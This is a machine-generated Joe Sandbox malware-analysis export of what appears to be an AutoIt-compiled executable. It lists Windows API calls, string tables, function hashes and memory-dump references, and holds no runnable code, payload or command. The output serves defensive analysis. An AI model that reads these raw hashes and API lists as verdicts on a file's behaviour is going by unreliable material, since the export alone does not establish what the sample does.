                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3521893082-0
                                                                                                                                                                                                                                                      • Opcode ID: 702274782f0b9954ed17006f2c50703a0d52fdd7a9d292e05b461651c628e64d
                                                                                                                                                                                                                                                      • Instruction ID: 0b6ec36fe252823905b0f2ad511af35ca22b664c4c785f72d3d2a5984509a7e5
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 702274782f0b9954ed17006f2c50703a0d52fdd7a9d292e05b461651c628e64d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8B91C076408315BFDB10DF64DC08E6B7BA9FF9A325F100A19F962961E0CB31D944EB52
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • DestroyWindow.USER32 ref: 00EDB98B
                                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00EDB9CD
                                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00EDB9D8
                                                                                                                                                                                                                                                      • DestroyIcon.USER32(00000000), ref: 00EDB9E3
                                                                                                                                                                                                                                                      • DestroyWindow.USER32(00000000), ref: 00EDB9EE
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 00F3D2AA
                                                                                                                                                                                                                                                      • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00F3D2E3
                                                                                                                                                                                                                                                      • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 00F3D711
                                                                                                                                                                                                                                                        • Part of subcall function 00EDB9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00EDB759,?,00000000,?,?,?,?,00EDB72B,00000000,?), ref: 00EDBA58
                                                                                                                                                                                                                                                      • SendMessageW.USER32 ref: 00F3D758
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00F3D76F
                                                                                                                                                                                                                                                      • ImageList_Destroy.COMCTL32(00000000), ref: 00F3D785
                                                                                                                                                                                                                                                      • ImageList_Destroy.COMCTL32(00000000), ref: 00F3D790
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                                      • API String ID: 464785882-4108050209
                                                                                                                                                                                                                                                      • Opcode ID: 193c77076fcf99975d98cf04ab855321b43dc4cb0af0db96ee83b733ef6bf416
                                                                                                                                                                                                                                                      • Instruction ID: 8624dae7958feafe7553c169d6ecb0361051f6471500f319636a71b2c649f427
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 193c77076fcf99975d98cf04ab855321b43dc4cb0af0db96ee83b733ef6bf416
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6012CE34604241DFDB20CF24D894BA9BBF4FF49324F18556AE989DB252D731EC42EB91
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 00F0DBD6
                                                                                                                                                                                                                                                      • GetDriveTypeW.KERNEL32(?,00F5DC54,?,\\.\,00F5DC00), ref: 00F0DCC3
                                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000000,00F5DC54,?,\\.\,00F5DC00), ref: 00F0DE29
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorMode$DriveType
                                                                                                                                                                                                                                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                                                                                                                                      • API String ID: 2907320926-4222207086
                                                                                                                                                                                                                                                      • Opcode ID: 37541d7e2f58e7449c5d4f7b6d7e9ccb1165c42fec45ca25374f20c2b641fe85
                                                                                                                                                                                                                                                      • Instruction ID: 636ec88b54b780605478a1f25737eb748e1ec62c1c2a7672fdd617e79366bea5
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 37541d7e2f58e7449c5d4f7b6d7e9ccb1165c42fec45ca25374f20c2b641fe85
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0651AF31749302EBC210DF98CD82E29B7E0FB94715B24991EF44BAB2D1DB61D946FA43
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __wcsnicmp
                                                                                                                                                                                                                                                      • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                                                                                                                                                      • API String ID: 1038674560-86951937
                                                                                                                                                                                                                                                      • Opcode ID: 819684a33bcefea0d7666fc90a3ec52e3292e6e67d248b4032eb6d3d15c634e6
                                                                                                                                                                                                                                                      • Instruction ID: 0635bf3b6bff9c15de0932ccf80ecb8a0ddc7aa2c17efa7a97884de44a1c72ce
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 819684a33bcefea0d7666fc90a3ec52e3292e6e67d248b4032eb6d3d15c634e6
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C0811B306402197ACB25AB64DD43FBE7BA8EF14310F146029FD0AB61C2EB61D956D296
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CharUpperBuffW.USER32(?,?,00F5DC00), ref: 00F26449
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: BuffCharUpper
                                                                                                                                                                                                                                                      • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                                                                                                                                                                      • API String ID: 3964851224-45149045
                                                                                                                                                                                                                                                      • Opcode ID: d37da22418e1e831c8871ad8e6f95891356e000ebc0b4ff7bfd04d0339006a28
                                                                                                                                                                                                                                                      • Instruction ID: cbf27b8a8be86c8c0214f57f9bbdfde411ba5e4e64c568a0541905fbade317ed
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d37da22418e1e831c8871ad8e6f95891356e000ebc0b4ff7bfd04d0339006a28
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BDC191306042558BCB04EF10D651A6EB7E5EF94354F14585EF886AB3E3DB21ED0BEB82
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetSysColor.USER32(00000012), ref: 00F2D5AE
                                                                                                                                                                                                                                                      • SetTextColor.GDI32(?,?), ref: 00F2D5B2
                                                                                                                                                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00F2D5C8
                                                                                                                                                                                                                                                      • GetSysColor.USER32(0000000F), ref: 00F2D5D3
                                                                                                                                                                                                                                                      • CreateSolidBrush.GDI32(?), ref: 00F2D5D8
                                                                                                                                                                                                                                                      • GetSysColor.USER32(00000011), ref: 00F2D5F0
                                                                                                                                                                                                                                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00F2D5FE
                                                                                                                                                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 00F2D60F
                                                                                                                                                                                                                                                      • SetBkColor.GDI32(?,00000000), ref: 00F2D618
                                                                                                                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 00F2D625
                                                                                                                                                                                                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00F2D644
                                                                                                                                                                                                                                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00F2D65B
                                                                                                                                                                                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00F2D670
                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00F2D698
                                                                                                                                                                                                                                                      • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00F2D6BF
                                                                                                                                                                                                                                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 00F2D6DD
                                                                                                                                                                                                                                                      • DrawFocusRect.USER32(?,?), ref: 00F2D6E8
                                                                                                                                                                                                                                                      • GetSysColor.USER32(00000011), ref: 00F2D6F6
                                                                                                                                                                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 00F2D6FE
                                                                                                                                                                                                                                                      • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00F2D712
                                                                                                                                                                                                                                                      • SelectObject.GDI32(?,00F2D2A5), ref: 00F2D729
                                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 00F2D734
                                                                                                                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 00F2D73A
                                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 00F2D73F
                                                                                                                                                                                                                                                      • SetTextColor.GDI32(?,?), ref: 00F2D745
                                                                                                                                                                                                                                                      • SetBkColor.GDI32(?,?), ref: 00F2D74F
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1996641542-0
                                                                                                                                                                                                                                                      • Opcode ID: 24b355f7418f19af0268548f248ff3ae3384822a23653b951327b50b333e9a75
                                                                                                                                                                                                                                                      • Instruction ID: 5a33a4cbbff8e5fa15941f24ab3a4dda74589ceff508a393a9478b60b6136d0b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 24b355f7418f19af0268548f248ff3ae3384822a23653b951327b50b333e9a75
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 58516B76900218BFEF119FA8DC48EAE7BB9FF49320F244115F915AB2A1D7719A40EF50
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00F2B7B0
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F2B7C1
                                                                                                                                                                                                                                                      • CharNextW.USER32(0000014E), ref: 00F2B7F0
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00F2B831
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00F2B847
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F2B858
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00F2B875
                                                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,0000014E), ref: 00F2B8C7
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00F2B8DD
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00F2B90E
                                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00F2B933
                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00F2B97C
                                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00F2B9DB
                                                                                                                                                                                                                                                      • SendMessageW.USER32 ref: 00F2BA05
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 00F2BA5D
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000133D,?,?), ref: 00F2BB0A
                                                                                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00F2BB2C
                                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(?), ref: 00F2BB76
                                                                                                                                                                                                                                                      • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00F2BBA3
                                                                                                                                                                                                                                                      • DrawMenuBar.USER32(?), ref: 00F2BBB2
                                                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,0000014E), ref: 00F2BBDA
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                                      • API String ID: 1073566785-4108050209
                                                                                                                                                                                                                                                      • Opcode ID: 639149354fa367b2732e88c3e64ed095a03cc229999cdf88c555d620e35923af
                                                                                                                                                                                                                                                      • Instruction ID: 7fbd6f7d6b28be92b8c9024b78fd895daddafe51da2e021a1696e058bcfdedbf
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 639149354fa367b2732e88c3e64ed095a03cc229999cdf88c555d620e35923af
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F6E17E7590022CABDB109FA5DC84EEE7BB8FF45720F148156FD19AA190D7748A81EF60
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 00F2778A
                                                                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 00F2779F
                                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000), ref: 00F277A6
                                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00F27808
                                                                                                                                                                                                                                                      • DestroyWindow.USER32(?), ref: 00F27834
                                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00F2785D
                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F2787B
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00F278A1
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000421,?,?), ref: 00F278B6
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00F278C9
                                                                                                                                                                                                                                                      • IsWindowVisible.USER32(?), ref: 00F278E9
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00F27904
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00F27918
                                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00F27930
                                                                                                                                                                                                                                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 00F27956
                                                                                                                                                                                                                                                      • GetMonitorInfoW.USER32 ref: 00F27970
                                                                                                                                                                                                                                                      • CopyRect.USER32(?,?), ref: 00F27987
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000412,00000000), ref: 00F279F2
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                                                                                                                                      • String ID: ($0$tooltips_class32
                                                                                                                                                                                                                                                      • API String ID: 698492251-4156429822
                                                                                                                                                                                                                                                      • Opcode ID: afd48d6fa053192bd0ed13559da4b41e38341d91ca9da52132ce396444aa0c54
                                                                                                                                                                                                                                                      • Instruction ID: 6cb310631a803d5073860474538ad0ad498f6b5f363c98008e91daff3d08fdeb
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: afd48d6fa053192bd0ed13559da4b41e38341d91ca9da52132ce396444aa0c54
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A5B1B071608310AFDB04EF64D948B6ABBE4FF89310F00891DF9999B291D771EC45DB92
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00EDA939
                                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000007), ref: 00EDA941
                                                                                                                                                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00EDA96C
                                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000008), ref: 00EDA974
                                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000004), ref: 00EDA999
                                                                                                                                                                                                                                                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00EDA9B6
                                                                                                                                                                                                                                                      • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 00EDA9C6
                                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00EDA9F9
                                                                                                                                                                                                                                                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00EDAA0D
                                                                                                                                                                                                                                                      • GetClientRect.USER32(00000000,000000FF), ref: 00EDAA2B
                                                                                                                                                                                                                                                      • GetStockObject.GDI32(00000011), ref: 00EDAA47
                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00EDAA52
                                                                                                                                                                                                                                                        • Part of subcall function 00EDB63C: GetCursorPos.USER32(000000FF), ref: 00EDB64F
                                                                                                                                                                                                                                                        • Part of subcall function 00EDB63C: ScreenToClient.USER32(00000000,000000FF), ref: 00EDB66C
                                                                                                                                                                                                                                                        • Part of subcall function 00EDB63C: GetAsyncKeyState.USER32(00000001), ref: 00EDB691
                                                                                                                                                                                                                                                        • Part of subcall function 00EDB63C: GetAsyncKeyState.USER32(00000002), ref: 00EDB69F
                                                                                                                                                                                                                                                      • SetTimer.USER32(00000000,00000000,00000028,00EDAB87), ref: 00EDAA79
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                                                                                                                      • String ID: AutoIt v3 GUI
                                                                                                                                                                                                                                                      • API String ID: 1458621304-248962490
                                                                                                                                                                                                                                                      • Opcode ID: 9b46f5a9543dcc795d6df95ab0b30a2134a99cbe7aeb260f7d1bc54be6424a5f
                                                                                                                                                                                                                                                      • Instruction ID: f02ee663eab16a23229a13529c28967390e437ec6a2109a510bbd3e6053662f6
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9b46f5a9543dcc795d6df95ab0b30a2134a99cbe7aeb260f7d1bc54be6424a5f
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 94B1AE75A0020A9FDB14DFA8DC45BED7BB8FB08324F15422AFA15A7390DB34D942EB51
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
